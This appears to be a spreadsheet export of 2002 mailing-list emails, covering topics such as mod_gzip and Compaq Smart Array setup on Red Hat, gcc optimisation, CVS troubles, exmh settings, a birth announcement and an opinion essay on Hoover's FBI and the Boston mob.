    <t>two seperate projects this weekend.  first mod_gzip which is an apache module to speed up serving static and dynamic mime(text/.*) web content. the second is the compaq smart array configs for linux. before i go on much more i'll cover the following bits: the server is running redhat 7.3 linux with all the updates on a compaq dl380. the client is running the same on a compaq laptop.  pretty much everything is stock redhat 7.3 - and i'm consciously trying to stick to that. ------------------------------------------------------------------------ mod_gzip:          there's a tutorial on linux.ie for it (thanks donnacha) but since i'm     not an apache person this only got me part of the way.  step by step,     this is what i did: 	# cd /root 	# wget [URL]http://www.remotecommunications.com[/URL] 	# gunzip mod_gzip.c.gz 	# apxs -ic mod_gzip.c          that should compile and install fine, so add the following to     your apache configs.  i've included comments to explain where they     should go.  my apache config is split among many files (which is     why i didn't use the -a flag to apxs). 	# put this after the last LoadModule line 	LoadModule gzip_module        /usr/lib/apache/mod_gzip.so 	# put this after the last LoadModule line 	AddModule mod_gzip.c 	# this just needs to go below the obove two lines. 	 	    mod_gzip_on                         Yes 	    mod_gzip_minimum_file_size          300 	    mod_gzip_maximum_file_size          0 	    mod_gzip_item_include               file    \.htm$ 	    mod_gzip_item_include               file    \.html$ 	    mod_gzip_item_include               file    \.txt$ 	    mod_gzip_item_include               file    \.php$ 	    mod_gzip_item_include               file    \.php3$ 	    mod_gzip_item_include               file    \.php4$ 	    mod_gzip_item_include               file    \.pl$ 	    mod_gzip_item_include               mime    text/.* 	    mod_gzip_item_include               mime    httpd/unix-directory 	    mod_gzip_item_include               handler ^perl-script$ 	    mod_gzip_item_include               handler ^server-status$ 	    mod_gzip_item_include               handler ^server-info$ 	    mod_gzip_item_exclude               file    \.css$ 	    mod_gzip_item_exclude               file    \.js$ 	    mod_gzip_item_exclude               mime    ^image/.* 	    mod_gzip_dechunk                    yes 	    # mod_gzip_min_http                 1000 	    mod_gzip_temp_dir                   /tmp 	    mod_gzip_keep_workfiles             No 	    LogFormat "%h \"%f\" %{mod_gzip_result}n %{mod_gzip_input_size}n %{mod_gzip_output_size}n %{mod_gzip_compression_ratio}npct." mod_gzip_logs 	    CustomLog logs/compression_log mod_gzip_logs 	     finally, poke apache: 	# service httpd reload     and after you've viewed some pages and check     /var/log/httpd/compression_log in order to see if it's working.     if you have /server-info avilable you should see that mod_gzip     is loaded.  a compressed line and a non-compressed line might look     like this: 	roo "/.../ssl_glossary.html" OK 15092 4726 69pct. 	roo "/.../ssl_template.head-num-7.gif" DECLINED:EXCLUDED 0 0 0pct. ------------------------------------------------------------------------ compaq smart array config:   (WARNING: YOU NEED A JVM FOR YOUR BROWSER)     i searched on google for "compaq smart array configuration linux" and     got a slew of hits.  one of them was a click away from this page: 	[URL]http://www.compaq.com[/URL]     i downloaded the rpm.  installed it. and ran the server per the     instructions.  note, the -R enables remote connections.  if you're     running the browser locally, run it without the -R and connect     to localhost. 	cpqacuxe -R     i found that galeon didn't work.  mozilla did.  i suspect it's because     pop-ups are disabled in galeon config, but i might be wrong.  it uses     java which is slow and memory hungry on this laptop.  feel free to     try galeon with pop-ups enabled if you want to.     so, point mozilla at http://yourserver:2301/ .  login as     administrator/administrator and change your password.  then go back     to the main page and click the little drive array graphic towards     the bottom.  configure your array as you want (i had to add a disk).     save your changes, and exit.  to stop the server, just do this: 	cpqacuxe -stop     in my case the drive was now accessible.  i started the process of     making the file systems by partitioning the drive.  i knew what     it would be called, but a grep for ida on the output of dmesg     confirmed it. 	fdisk /dev/ida/c0d1     and from there i built the filesystems and so on. hope this helps some folks, kevin --  Kevin Lyda - kevin@doolin.com Lead Programmer Doolin Technologies --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.remotecommunications.com http://www.compaq.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Sun, 28 Jul 2002 16:25:59 -0500</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 16:25:59 -0500</t>
  </si>
  <si>
    <t>Re: cvs access working?</t>
  </si>
  <si>
    <t>--==_Exmh_49691723P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Sun, 28 Jul 2002 16:05:37 -0500 &gt; &gt; I did a commit on friday and I just did an update right now. I just did another commit.  It was a minor change I'd been thinking of, so I  thought I'd check it in just to test cvs. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_49691723P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9RGFnK9b4h5R0IUIRAllfAJ9BUoCuOA3+kOIMHVBeRU5S7HPg7gCeKv0Z j0oRuMgmAL+NMS9sjvoXyVw= =OzEq -----END PGP SIGNATURE----- --==_Exmh_49691723P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Sun, 28 Jul 2002 16:05:37 -0500</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 16:05:37 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_13609133P Content-Type: text/plain; charset=us-ascii &gt; From:  Brent Welch  &gt; Date:  Fri, 26 Jul 2002 15:00:57 -0700 &gt; &gt; Can anyone access the CVS server for exmh? &gt; The last thing I was able to do was try a "cvs commit", but &gt; I got an "up-to-date check failed" for a couple files, &gt; exmh.CHANGES and lib/msg.tcl, I think, so I then tried "cvs update". &gt; I get a password prompt, and then it just hangs. &gt;  &gt; cat CVS/Root &gt; welch@cvs.sourceforge.net:/cvsroot/exmh I did a commit on friday and I just did an update right now. cat CVS/Root  :ext:cwg@cvs.exmh.sourceforge.net:/cvsroot/exmh --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_13609133P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9RFygK9b4h5R0IUIRAvp1AJ4uedoak2We0nGHfzih7g+6TZEI3QCfccvt GLM1U8Y3z4JPyzUYNHLE0Zc= =6M2X -----END PGP SIGNATURE----- --==_Exmh_13609133P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: John Gay &lt;johngay@eircom.net&gt;\nDate: Sun, 28 Jul 2002 12:28:05 +0100</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 12:28:05 +0100</t>
  </si>
  <si>
    <t>[ILUG] Re: ILUG digest, Vol 1 #2734 - 11 msgs</t>
  </si>
  <si>
    <t>On Sun 28 Jul 2002 06:29, ilug-admin@linux.ie wrote: &gt; Message: 3 &gt; From: "John Moran"  &gt; To: "ILUG"  &gt; Subject: RE: [ILUG] Optimizing for Pentium Pt.2 &gt; Date: Sat, 27 Jul 2002 17:10:39 +0100 &gt; &gt; gcc, glibc and binutils, which the lfs site says not to optimise, &gt; already determines what system you're compiling on, and optimises itself &gt; to that. That's my understanding of how it works anyway. &gt; &gt; John &gt; &gt; Subject: Re: [ILUG] Optimizing for Pentium Pt.2 That was my understanding too, but I since fould out that for Linux: Most programs and libraries by default are compiled with optimizing level 2 (gcc options -g and -O2) and are compiled for a specific CPU. On Intel  platforms software is compiled for i386 processors by default. If you don't wish to run software on other machines other than your own, you might want to change the default compiler options so that they will be compiled with a  higher optimization level, and generate code for your specific architecture. Therefore:     export CFLAGS="-O3 -march=" &amp;&amp;     CXXFLAGS=$CFLAGS This is a minimal set of optimizations that ensures it works on almost all platforms. The option march will compile the binaries with specific instructions for that CPU you have specified. This means you can't copy this binary to a lower class CPU and execute it. So these are the optimizations I need to worry about, and the optimizations  that lfs says to disable before compiling GCC or GlibC. However, GlibC seems  the most likely candidate for optimization since it provides the libs used by  even the most simple programs to access system calls in the kernel. I'm still waiting for info from the GCC mailing list RE: optimising/patching  GCC for performance improvement. So far the only suggestion has been to try  using icc, Intels C compiler. It's known to work with the kernel, but user  apps, and I guess libs and such might need rewriting to compile, and I'm not  prepared to go to this length. For QT and KDE it seems there are also gains to be made with object  pre-linking, but there are also risks with this so I'll just have to suck it  and see. Either way, I'm going to get started building the base today. I'm  still waiting for some DRI patches for my GVX1 card but it'll probably been  several days before I'm ready to build X anyway. Cheers, 	John Gay --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Paul Kelly &lt;longword@esatclear.ie&gt;\nDate: Sun, 28 Jul 2002 03:41:50 +0100</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 03:41:50 +0100</t>
  </si>
  <si>
    <t>John Gay wrote:\n&gt; looking into these things. As Isaid, the PGCC site does not seem to have been \n&gt; updated in at least a year or more?!? I am also looking into GCC itself. Now \n&gt; that the 3.1. series is out, it might be better than when the PGCC patches \n&gt; were written\n\ngcc has been as good as or better than pgcc for quite a while. pgcc was \nwas written back in the days when gcc splintered due to a perception of \nslow progress on the main branch. A number of Linux distributions wound \nup using egcs, partly derived from the pgcc work as I recall. Happiness \nwas restored to the world with gcc 2.95 and later.\n\n &gt; The bottom line is, Pentiums have better instruction sets than\n&gt; the original 386 instructions that they still support.\n\nNot really, no. The only instruction of consequence (to gcc anyway) \nsince the i386 was the CMOV introduced with the Pentium Pro. gcc 2.95 \nwill use that instruction if directed to with -march=pentiumpro and you \nwill generally get a few percent improvement out of it. Code compiled \nwith that option will fail on Pentium and earlier processors.\n\n&gt; The Pentium also \n&gt; started introducing pipelining so properly generated code can be upto 30% \n&gt; faster than equivulent code that performs the same function!\n\nThat's the art of instruction scheduling - rearranging the instructions \ngenerated by the compiler such that they make best use of the parallel \n("superscalar") pipelines present in a modern CPU. gcc 2.95 has a fair \ngo at scheduling according to the -mcpu=pentium/pentiumpro option. gcc \n3.1 does a better job, and fine tunes for a few more processors such as \nathlon and athlon-xp. They're in the process of replacing the compiler's \ninstruction scheduling with a whole new mechanism that should do an even \nbetter job, but that's a ways down the road yet in gcc 3.3.\n\nAs for the exotic extra instructions sets, gcc 3.1 will make use of SSE \nor SSE2 instructions instead of 387 instructions if you use the \n-mfpmath=sse option and you may see some speed benefit from it, but \nthere's a chance you may also see incompatibilities. gcc will still use \ni387 code for missing functionality in the SSE instruction set (double \nprecision floats for example).\n\nAFAIK no current gcc will ever use MMX or 3DNOW! instructions though gcc \n3.1 enables user code to explicitly generate these instructions with C \ncode. The kernel sometimes uses these instruction sets to get super-fast \nblock copies of memory or RAID math but not much else.\n\n&gt; Not sure what improvements the P4 introduce? I think it's mostly just speed \n&gt; improvements rather than any execution changes.\n\nP4 introduced SSE2, a _MUCH_ improved version of SSE and a viable \nreplacement for i387 FPU code. SSE supports only single precision floats \nwhile SSE2 can handle doubles. MMX and SSE shared registers with the FPU \nwhich hobbles them a bit, but SSE2 has its own large, dedicated register \nfile. So far P4 is the only CPU equipped with SSE2. AMD's x86-64 CPUs \nare said to have it as well. Of course x86-64 itself is a whole other \nball game...\n\nPaul.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: vox@mindvox.com\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Sun, 28 Jul 2002 00:11:15 -0400 (EDT)</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 00:11:15 -0400 (EDT)</t>
  </si>
  <si>
    <t>vox@mindvox.com</t>
  </si>
  <si>
    <t>Re: [vox] Re: And Away We go</t>
  </si>
  <si>
    <t>On Sat, 27 Jul 2002, David Parmet wrote:\n--]\n--]Unless, like mine (who made me email everybody while she was on the phone\n--]with her OB), his wife is a bigger geek than he is.\n--]\n\nShe made me do the calls and look for a terminal and she even reminded me\nto update wsmf.org. Its a geekygeek family.\n\nAnd I had a laptop/firewire/vidcam/modem solution all set up but she nixed\nthat very very harshly....\n\n-tom\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Sun, 28 Jul 2002 00:08:02 -0400 (EDT)</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 00:08:02 -0400 (EDT)</t>
  </si>
  <si>
    <t>Benjamin Wallace Higgins</t>
  </si>
  <si>
    <t>At 12:45 am Benjamin Wallace Higgins made a crash entry into\n the world. After a night of on again off again activity a C section\n was called for near noon. Seems the little hacker was messing\n with the internal cables and got three turns of the umbilical cord\n around his neck for the effort. Ill have to teach him about the art\n of cable bundling. Benjamin Wallace came out at 6 lbs 13 oz 20\n somthing inches tall and doing what all Higgins boys do best...\n feed and sleep. Mother and Child are doing great.\n\nMOre when I get teh chance. We are in the hospital for 3 days but I have a\nfree terminal scoped out that now has ssh on it.\n\nThe first pewp...man they prep you for it but northing really can...Wowzer\nthat stuff is road tar.\n\n\nlates\n\n-tom\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: CDale &lt;cdale@techmonkeys.net&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Sun, 28 Jul 2002 00:05:08 -0400 (EDT)</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 00:05:08 -0400 (EDT)</t>
  </si>
  <si>
    <t>Re: And Away We go</t>
  </si>
  <si>
    <t>On Sat, 27 Jul 2002, CDale wrote:\n\n--]A true geek.  Runs to the puter to post before taking a laboring wife to\n--]the hospital.  I'd kill you.  LOL\n\nScripts baby:)-\n\nOne key and I was off.well a few more than one but well under .30 secs of\ntime.\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Sun, 25 Aug 2002 21:58:24 -0500</t>
  </si>
  <si>
    <t>Sun, 25 Aug 2002 21:58:24 -0500</t>
  </si>
  <si>
    <t>Re: defaulting to showing plaintext versions of e-mails</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Sat, 24 Aug 2002, "Harlan" == Harlan Feinstein wrote:\n\n  Harlan&gt; What's the trick again to have it default to showing\n  Harlan&gt; text/plain instead of html?\n\nIn ~/.exmh/exmh-defaults add:\n\n*mime_alternative_prefs: text/plain text/enriched text/richtext text/html\n\nOrder possible alternatives from _your_ most preferred to least\npreferred.\n\n--Hal\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org,\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Sun, 25 Aug 2002 21:18:34 -0400</t>
  </si>
  <si>
    <t>Sun, 25 Aug 2002 21:18:34 -0400</t>
  </si>
  <si>
    <t>Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org,</t>
  </si>
  <si>
    <t>TGE: Thugs of South Boston and The Revenge of the Bandit Princess</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Thugs of South Boston and The Revenge of the Bandit Princess The Geodesic Economy Robert A. Hettinga Sunday, August 25, 2002 (BOSTON) When you think about it one way, the FBI/Winter Hill vs. Patriarcha/Angiulo Cosa Nostra fight was just another race war between thugs. Put crudely, and at its most racist, the FBI and the Winter Hill Gang were the (mostly) Irish thugs, and Patriarcha's "family" were, of course, the (mostly) Italian thugs. Think Scorsese's upcoming "Gangs of New York", only with counter-reformatory overtones. Hoover's South Boston "social-club" putsch, starting in the mid 1960's, was particularly audacious in hindsight. The U.S. Federal Government actually decided to underwrite a reversal of the prohibition-era capture of the nation's rackets by the Italians from the Irish. The fact that the plot was hatched not for New York, but for South Boston, the most Irish place in the US, only makes even more gigantic the Big Lie that was told by the FBI to its ostensible political masters about bringing down organized crime there once and for all. The result, as we all found out, wasn't swapping the heroin of Italian Boston mob violence for Irish methadone. Hoover was, posthumously, swapping it for Oxycontin, or crystal methamphetamine - -- or, more properly, PCP. The absolute psychopathology of violence in Whitey Bulger's crack-cocaine-era reign of Boston's drug markets, like the identical FBI-sponsored reigns or violent horror by other also-rans in cities across the US as a whole, went up whole orders of magnitude, not mere percentage points. As Stalin said once, quantity has a quality all it's own. And, make no mistake, J. Edgar Hoover was directly responsible that "quality" of carnage, nation-wide. So, yes, on paper at least, it really *was* just the swapping of one gang of racist thugs for another, and the result was, on paper, at least, business as usual. Same stuff, different century, with apparently decent people like Mr. Salvati et.al accidently ground on the gears of "justice" like so much hamburger. However, to be much more macabre about it, that hamburger was "greasing", if you will, an auto de fe only a homicidal lunatic could love: a perfectly functioning market, legislated out of existence -- on paper, if nowhere else -- by government fiat and the, back-door, but still elitist, will to power of H.L. Mencken's famous "bluenoses and busybodies". It all starts, like all true evil does, from the most innocent of beginnings. What she couldn't do to alcohol, teatotaling Mrs. Grundy then tried to do to anything else she could think of that had a smaller, "manageable" demand. The bloody result was, like nine more heads of the hydra, an increasingly ubiquitous universal prohibition, in more markets, and for more things, as the 20th century wore on. Every time some recreational drug was found to be addictive, or harmful, or physically distasteful, or carcinogenic -- or, now, apparently, fattening -- and then prohibited, exactly the same thing happened to its markets that happened to alcohol during the Volstead years. A *larger* market than before the prohibition. Hugely lucrative profits for anyone with the moral stomach to violently scale newly-legislated "barriers to competition" imposed on them by the state. Increasingly violent attacks by the government on users of those substances. And, finally, the ultimate in evil -- the kind of evil this country actually fought wars to end -- increasingly coercive axe-handle beatings, by our own government, of the sacred liberty of the average, but now unavoidably-law-breaking, citizenry. As Ayn Rand cynically observed a long time ago, you don't need government if nobody's breaking the law. In some twisted corollary to Parkinson's Law, governments, to survive, *need* more people, breaking more laws, or they can never justify the money they confiscate at tax time. And, to bring us back to the point, David Friedman would probably echo here his father Milton's famous observation that government regulations only benefit the regulated sellers in a given market, and never the consumer, much less the economy as a whole. Even, *especially*, if those sellers are *breaking* the law, as they are in the increasingly ubiquitous prohibition of risky behavior that our government now imposes on us. And there, absent the apparent grace of Mr. Hoover, went Mr. Salvati. In fact, Hayek himself, in "The Road to Serfdom", couldn't have predicted any better the gory consequences of Hoover's blatant imposition, "for our own good", of Vietnam-era statist power at the neighborhood level. And, furthermore, *Stalin* couldn't have had better "useful idiots" than Hoover did -- and neither, by an absolutely literal extension, did Whitey Bulger after Hoover. Useful idiots on both sides of the congressional aisle. Idiots who were eating out of Hoover's power-craven hand for the entire middle of the 20th century -- and Whitey Bulger's hand, whether they knew it or not, until the end of the millennium. A time, you'll notice, which saw the increasingly steady imposition of "mob" violence, and market control, from both state and illegal interests, way beyond the imaginings of even the most power-mad, rum-running, stock-kiting, movie-flopping, bureau-pumping, Nazi-appeasing Irish-Bostonian Little Caesar. Or, as for that matter, his safely trust-funded, and now strictly political, descendents. In terms of actual financial economics, think of what happened to Mr. Salvati and the others, dead or alive, as a "transfer-price", in human lives, of the inevitable consequence of MacNamara-style Vietnam-era Keynesian "social-cost" input-output accounting at its most despicable, and you can almost begin to fathom the atrocity that was committed by Hoover, and his co-religionists in state economic control, in the name of what really was, as you'll now agree, just a race war between thugs up in Boston. This shouldn't be a surprise, really. All race wars are at least fought by thugs, though they're usually conceived elsewhere, and endorsed, at the time, by all the "right" people, for all the "right" reasons. As far as the FBI itself goes, remember Mancur Olson's observation that a "prince" is just a stationary bandit. Though, given his penchant for women's clothing, for other men, and, what's actually obscene, for violently hypocritical treatment of people of his own affectional preference, I suppose we can call J. Edgar Hoover a bandit "princess", instead. "Bandit Queen", of course, would be a grievous insult to queens -- and real bandits -- everywhere. Cheers, RAH - --------- [URL]http://www.nytimes.com[/URL] &amp;pagewanted=print&amp;position=top The New York Times August 25, 2002 Hoover's F.B.I. and the Mafia: Case of Bad Bedfellows Grows By FOX BUTTERFIELD BOSTON, Aug. 24 - It was March 1965, in the early days of J. Edgar Hoover's war against the Mafia. F.B.I. agents, say Congressional investigators, eavesdropped on a conversation in the headquarters of New England's organized-crime boss, Raymond Patriarca. Two gangsters, Joseph Barboza and Vincent Flemmi, wanted Mr. Patriarca's permission to kill a small-time hoodlum, Edward Deegan, "as they were having a problem with him," according to an F.B.I. log of the conversation. "Patriarca ultimately furnished this O.K.," the F.B.I. reported, and three days later Mr. Deegan turned up dead in an alley, shot six times. It was an extraordinary situation: The Federal Bureau of Investigation had evidence ahead of time that two well-known gangsters were planning a murder and that the head of the New England Mafia was involved. But when indictments in the case were handed down in 1967, the real killers - who also happened to be informers for the F.B.I. - were left alone. Four other men were tried, convicted and sentenced to death or life in prison for the murder, though they had had nothing to do with it. One, Joseph Salvati, who spent 30 years in prison, filed notice with the Justice Department last week that he planned to sue the F.B.I. for $300 million for false imprisonment. His is the latest in a series of lawsuits against the F.B.I., the Justice Department and some F.B.I. agents growing out of the tangled, corrupt collaboration between gangsters and the F.B.I.'s Boston office in its effort to bring down the mob. The lawsuits are based on evidence uncovered in the last five years in a judicial hearing and a Justice Department inquiry. But some of the most explosive evidence has only recently come to light, including documents detailing conversation in which Mr. Patriarca approved the murder. They were released as part of an investigation by the House Committee on Government Reform, which has pressured the department into turning over records about the F.B.I in Boston. The documents show that officials at F.B.I. headquarters, apparently including Mr. Hoover, knew as long ago as 1965 that Boston agents were employing killers and gang leaders as informers and were protecting them from prosecution. "J. Edgar Hoover crossed over the line and became a criminal himself," said Vincent Garo, Mr. Salvati's lawyer. "He allowed a witness to lie to put an innocent man in prison so he could protect one of his informants." Mr. Barboza was a crucial witness at trial against Mr. Salvati and may have implicated him because Mr. Salvati owed $400 to a loan shark who worked for Mr. Barboza. Asked about the documents showing that Mr. Hoover knew of Mr. Salvati's innocence when he was put on trial, Gail Marcinkiewicz, a spokeswoman for the F.B.I. in Boston, declined to comment, citing the pending litigation. A Justice Department task force is continuing to investigate misconduct in the Boston office. In one of the first results of the investigation, one retired agent, John J. Connolly, is awaiting sentencing next month after being convicted of racketeering and obstruction of justice for helping two other mob leaders who were F.B.I. informers, James Bulger and Stephen Flemmi. Vincent and Stephen Flemmi are brothers. The Government Reform Committee, led by Representative Dan Burton, Republican of Indiana, has uncovered memorandums from the Boston office to headquarters in Washington revealing the bureau's knowledge that Vincent Flemmi and Mr. Barboza were involved in killing Mr. Deegan. A memorandum a week after the killing described the crime, including who fired the first shot. Then, on June 4, 1965, Mr. Hoover's office demanded to know what progress was being made in developing Vincent Flemmi as an informer. In a reply five days later, the special agent in charge of the Boston office said that Mr. Flemmi was in a hospital recovering from gunshot wounds but because of his connections to Mr. Patriarca "potentially could be an excellent informant." The agent also informed Mr. Hoover that Mr. Flemmi was known to have killed seven men, "and, from all indications, he is going to continue to commit murder." Nevertheless, the agent said, "the informant's potential outweighs the risk involved." A Congressional investigator called the exchange chilling. "The most frightening part is that after being warned about Flemmi's murders, the director does not even respond," the investigator said. "There is no message not to use a murderer as a government informant." The origin of the corruption scandal was public and political pressure on Mr. Hoover to move more forcefully against the growing power of the Mafia, which he had largely ignored. In Boston, F.B.I. agents recruited Mr. Barboza and Mr. Flemmi and developed close ties to a rival criminal organization, the Winter Hill Gang, led by Mr. Bulger. Both sides got what they wanted, according to the investigations and the trial of Mr. Connolly. The F.B.I. got information that eventually helped destroy the Patriarca and Angiulo families, which controlled organized crime in New England. Mr. Bulger's gang was able to take over the rackets in Boston, sell drugs and even commit murder while the F.B.I. looked the other way. One reason the F.B.I. may not have used its information about Mr. Patriarca's involvement in the Deegan murder, Congressional investigators say, is that it came from an illegal listening device in his Providence, R.I., headquarters. The F.B.I. agent who transcribed the conversation made it appear that the information was coming from unnamed informants, to disguise the use of the device, the investigators say. Mr. Salvati, a former truck driver, now 69, had his sentence commuted in 1997 by Gov. William F. Weld. Last year, while he was still on parole, his murder conviction was dismissed by a Massachusetts state judge after the Justice Department task force made public documents suggesting his innocence. Two of the other wrongly convicted men died in prison. Their survivors have joined the fourth man, Peter Limone, in a $375 million lawsuit against the Justice Department. Mr. Limone was sentenced to die in the electric chair. His life was spared only when Massachusetts outlawed the death penalty in 1974. Mr. Salvati lives in a modest apartment in Boston's North End with his wife, Marie, who visited him in prison every week during those 30 years. Each week Mr. Salvati sent her a romantic card, which she put on the television set. It was, Mr. Garo said, all they had of each other. -----BEGIN PGP SIGNATURE----- Version: PGP 7.5 iQA/AwUBPWmB2sPxH8jf3ohaEQL9qgCgxHq0ee06UEsNv8u8wgvmjf9K7S4An3Rb 3srsGomWjNDwIaKoEHOfNHpI =OELD -----END PGP SIGNATURE----- --  ----------------- R. A. Hettinga  The Internet Bearer Underwriting Corporation  44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: FoRK &lt;fork@spamassassin.taint.org&gt;\nFrom: Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt;\nDate: Sun, 25 Aug 2002 17:25:32 -0700</t>
  </si>
  <si>
    <t>Sun, 25 Aug 2002 17:25:32 -0700</t>
  </si>
  <si>
    <t>Doom 3</t>
  </si>
  <si>
    <t>Doom 3 will be based on a peer to peer architecture says\nCmdrTaco quoting Ant quoting Carmack.  \n\nGreg\n\n[URL]http://slashdot.org[/URL]\n\nDOOM 3 will use P2P System?\n\n           Posted by CmdrTaco on Sunday August\n           25, @09:19AM\n           from the\n           i'll-believe-it-when-I'm-fragged-on-it\n           dept.\n           Ant writes "From Page 6 of FiringSquad's\n           QuakeCon 2002 Postmortem article: John Carmack said\n           something at the end of the Q&amp;A about how the\n           multiplayer will be only four players? Tim: After 2 hours of\n           talking up at the podium, sometimes you leave a few details\n           out. Doom 3 multiplayer will be fully scalable. It will be a\n           peer to peer system. We haven't started working on it yet.\n           Tell everyone not to panic - it will be fine. John just forgot\n           to mention it'll be scalable past four players. It's hard to\n           give a hard number because we haven't started working on\n           it yet. Right now we're focused on making Doom 3 a\n           kickass, over the top single player game."\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://slashdot.org http://xent.com</t>
  </si>
  <si>
    <t>To: johnhall@evergo.net, fork@spamassassin.taint.org\nFrom: "James Tauber" &lt;jtauber@jtauber.com&gt;\nDate: Sun, 25 Aug 2002 16:50:54 UT</t>
  </si>
  <si>
    <t>Sun, 25 Aug 2002 16:50:54 UT</t>
  </si>
  <si>
    <t>"James Tauber" &lt;jtauber@jtauber.com&gt;</t>
  </si>
  <si>
    <t>johnhall@evergo.net, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: A biblical digression</t>
  </si>
  <si>
    <t>On Sat, 24 Aug 2002 11:07:00 -0700, "John Hall"  said: &gt; Ran across a site which claimed to explain the original meaning of the &gt; Ten Commandments.  It seems some of those meanings have evolved a bit, &gt; too. By "meanings have evolved" do you [or they] mean that the Hebrew words have changed meaning or that our understanding of the Hebrew words have changed? Or do they posit a pre-Mosaic form of the laws that had evolved by time of the Pentateuch? &gt; In particular, there was a claim that the commandment on stealing was &gt; actually specifically about 'man stealing -- selling a free man into &gt; slavery. This seems bogus to me. A quick check of the text indicates the the Hebrew word in question is GANAV which elsewhere in the Pentateuch (eg Gen 44.8) is used to mean steal silver and gold amongst other things. In July 1999, I made the following comment in response to a similar claim about the "real" meaning of one of the ten commandments: """ &gt; The translations since cause problems at each successive remove We have the original language versions, though, so this is not an issue. &gt; I'm sure most everyone is familiar with the argument that the meaning of the commandment &gt; is 'thou shalt not murder' rather than 'kill,' This has nothing to do with successive translations. It is based on our knowledge of the meaning of the Hebrew word "ratsach". Most modern translations I've seen translate it "murder" but elsewhere the word is used of an animal killing a human (something for which most English speakers wouldn't use the word "murder"). """ - [URL]http://www.xent.com[/URL] James --    James Tauber   jtauber@jtauber.com [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Joe Berry" &lt;joe@topshot.com&gt;,\nFrom: "Adam Goryachev" &lt;mailinglists@websitemanagers.com.au&gt;\nDate: Sun, 25 Aug 2002 15:39:13 +1000</t>
  </si>
  <si>
    <t>Sun, 25 Aug 2002 15:39:13 +1000</t>
  </si>
  <si>
    <t>"Adam Goryachev" &lt;mailinglists@websitemanagers.com.au&gt;</t>
  </si>
  <si>
    <t>"Joe Berry" &lt;joe@topshot.com&gt;,</t>
  </si>
  <si>
    <t>RE: [Razor-users] Reducing impact from tons of email</t>
  </si>
  <si>
